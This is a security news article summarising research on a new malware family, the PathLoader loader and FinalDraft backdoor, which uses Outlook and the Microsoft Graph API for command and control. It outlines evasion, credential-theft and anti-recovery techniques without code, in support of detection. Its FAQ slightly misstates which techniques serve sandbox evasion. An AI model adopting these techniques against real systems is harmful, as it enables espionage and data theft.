New Family of Data-Stealing Malware Exploits Microsoft Outlook for Command and Control
Watch for the Signs
A new family of data-stealing malware has been discovered, using Microsoft Outlook as a communication channel through the abuse of the Graph API, and includes a way to bypass hashed passwords. The malware, created by an unnamed group, targets the foreign ministry of a South American nation, as well as a university in Southeast Asia and telecoms in that region.
Campaign Details
The campaign against the South American country may have started in November 2024, when Elastic Security detected a tight cluster of endpoint behavioral alerts within the country’s Foreign Ministry. The initial compromise is unclear, but the gang used living-off-the-land tactics once inside, including using Windows’ certutil application to download files.
Malware Components
The main components of the malware used by the attacker include a loader and a backdoor. The loader, named Pathloader, is a lightweight Windows executable file that downloads and executes encrypted shellcode hosted on a remote server. It uses techniques to avoid immediate execution in a target organization’s sandbox. To block static analysis, it performs API hashing and string encryption.
The backdoor, named FinalDraft, is a 64-bit malware written in C++ that focuses on data exfiltration and process injection. It includes several modules that can be injected by the malware, and their output is forwarded to a command and control (C2) server. Initial gathering of information includes computer name, account username, internal and external IP addresses, and details about running processes. FinalDraft also includes a pass-the-hash toolkit similar to Mimikatz to deal with stolen NTLM hashes.
Outlook-based Command and Control
One method of communication is via the Outlook mail service, using the Microsoft Graph API. This API allows developers to access resources hosted on Microsoft cloud services, including Microsoft 365. Although a login token is needed for this API, the FinalDraft malware has the ability to capture a Graph API token.
Additional Features
FinalDraft can also:
- Install a TCP listener after adding a rule to the Windows Firewall. This rule is removed when the server shuts down.
- Delete files, and prevent IT from recovering them by overwriting the data with zeros before deletion.
Detection Rules
Elastic Security has created Yara rules to help defenders detect PathLoader and FinalDraft on Windows, as well as FinalDraft on Linux. These rules are available on GitHub.
Conclusion
This new family of data-stealing malware poses a significant threat to organizations, as it uses a well-engineered, highly-capable, and novel intrusion set to target sensitive information. CISOs should be aware of the signs of attack, including the use of Windows Remote Management’s Remote shell plugin (WinrsHost.exe) and the Graph API.
FAQs
Q: What is the main purpose of the malware?
A: The main purpose of the malware is to steal sensitive information and exfiltrate it to a command and control server.
Q: How does the malware communicate?
A: The malware uses the Outlook mail service and the Microsoft Graph API to communicate with its command and control server.
Q: What are the components of the malware?
A: The malware consists of a loader and a backdoor, with the loader named Pathloader and the backdoor named FinalDraft.
Q: How does the malware evade detection?
A: The malware uses techniques such as API hashing and string encryption to avoid immediate execution in a target organization’s sandbox.
